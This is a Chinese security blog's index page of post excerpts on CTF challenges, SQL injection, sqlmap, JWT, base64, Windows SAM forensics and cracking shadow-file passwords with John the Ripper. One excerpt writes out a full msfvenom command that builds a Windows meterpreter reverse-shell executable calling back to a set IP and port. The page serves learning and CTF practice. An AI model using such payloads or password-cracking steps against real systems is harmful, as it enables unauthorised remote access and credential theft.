路漫漫其修远兮,吾将上下而求索

导航

上一页 1 ··· 25 26 27 28 29 30 31 32 33 ··· 36 下一页

2020年7月3日 #

第三届NSCTF测试题Code php 之MD5碰撞和php strcmp函数绕过

摘要: 1、打开网页如图,F12发现code.txt: 2、需要php代码审计,提示需要get方式提交3个参数(v1、v2、v3)且v1和v2的值不同,但md5后的值相同(中间是&&与符号),为真时再利用strcmp函数判断v3和$flag是否相同,为真输出flag; 3、在问了几个朋友后,得到一些提示,首 阅读全文

posted @ 2020-07-03 17:26 爱在西元间 阅读(933) 评论(0) 推荐(0) 编辑

PUT方法提交message

摘要: put me a message then you can get the flag: 根据提示使用PUT方法提交看看: 根据提示输入message: base64解码后: 阅读全文

posted @ 2020-07-03 16:37 爱在西元间 阅读(1186) 评论(0) 推荐(0) 编辑

2020年7月1日 #

使用John the Ripper破解sha512加密的shadow文件密码

摘要: John the Ripper shadow文件解析 文件的格式为:{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效 阅读全文

posted @ 2020-07-01 14:34 爱在西元间 阅读(7826) 评论(1) 推荐(0) 编辑

2020年6月18日 #

第2章 SQL注入攻击:课时1:注入攻击原理及自己编写一个注入点

摘要: OWASP TOP10 漏洞第一就是sql注入 以及乌云网上爆出的漏洞基本5个就有1个是sql注入漏洞,所以要引起重视。 sql注入只跟数据库有关,跟平台或脚本无关(不管是php、asp、jsp还是windows、linux) 阅读全文

posted @ 2020-06-18 10:25 爱在西元间 阅读(233) 评论(0) 推荐(0) 编辑

2020年6月16日 #

配置IIS10支持php语言脚本

摘要: 基本可以参考下面的链接去做,只是有个地方需要注意下! <><><><>在添加模块映射时提示“FastCgiModule不是可识别的本机模块……”(参考:FastCgiModule不是可识别的本机模块 的解决办法 | 我的BLOG ) PS:就是appwiz.cpl这里需要添加这些(添加后可以刷新II 阅读全文

posted @ 2020-06-16 15:43 爱在西元间 阅读(457) 评论(0) 推荐(0) 编辑

2020年6月11日 #

身边的base64解码工具

摘要: Linux base64工具(带有-d标志用于解码): $ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 | base64 -d {"typ":"JWT","alg":"HS256"} 浏览器JavaScript控制台: >> atob("eyJ0eXAiOiJ 阅读全文

posted @ 2020-06-11 18:16 爱在西元间 阅读(482) 评论(0) 推荐(0) 编辑

什么是JWT

摘要: 什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息, 阅读全文

posted @ 2020-06-11 11:28 爱在西元间 阅读(133) 评论(0) 推荐(0) 编辑

2020年6月10日 #

msfvenom的shell在windows中的使用

摘要: msfvenom的shell在windows中的使用 msfvenom生成shell.exe msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe 输入 阅读全文

posted @ 2020-06-10 12:57 爱在西元间 阅读(833) 评论(0) 推荐(0) 编辑

2020年6月2日 #

sqlmap和手注

摘要: get方式的注入用 sqlmap -u url+参数 post方式通过保存请求到文件,然后用 sqlmap -r xxx.txt 如果上面无效时,可以试试添加--data="name=value"来指定传参进行测试注入。 下面的情况可以用sqlmap -u url --data="name=valu 阅读全文

posted @ 2020-06-02 23:31 爱在西元间 阅读(361) 评论(0) 推荐(0) 编辑

2020年6月1日 #

Windows硬盘文件分析取证(新建的用户名)-通过SAM文件获取用户名的三种方式

摘要: *.E01文件经过百度得知是镜像压缩文件,可以用IsoBuster软件打开,也可以用AccessData FTK Imager工具打开,加载后获取到SAM文件和system文件 Kali中chntpw工具找出SAM文件的用户名 用SAMInside工具导入SAM和System找出用户名 用windo 阅读全文

posted @ 2020-06-01 13:47 爱在西元间 阅读(1093) 评论(0) 推荐(0) 编辑

上一页 1 ··· 25 26 27 28 29 30 31 32 33 ··· 36 下一页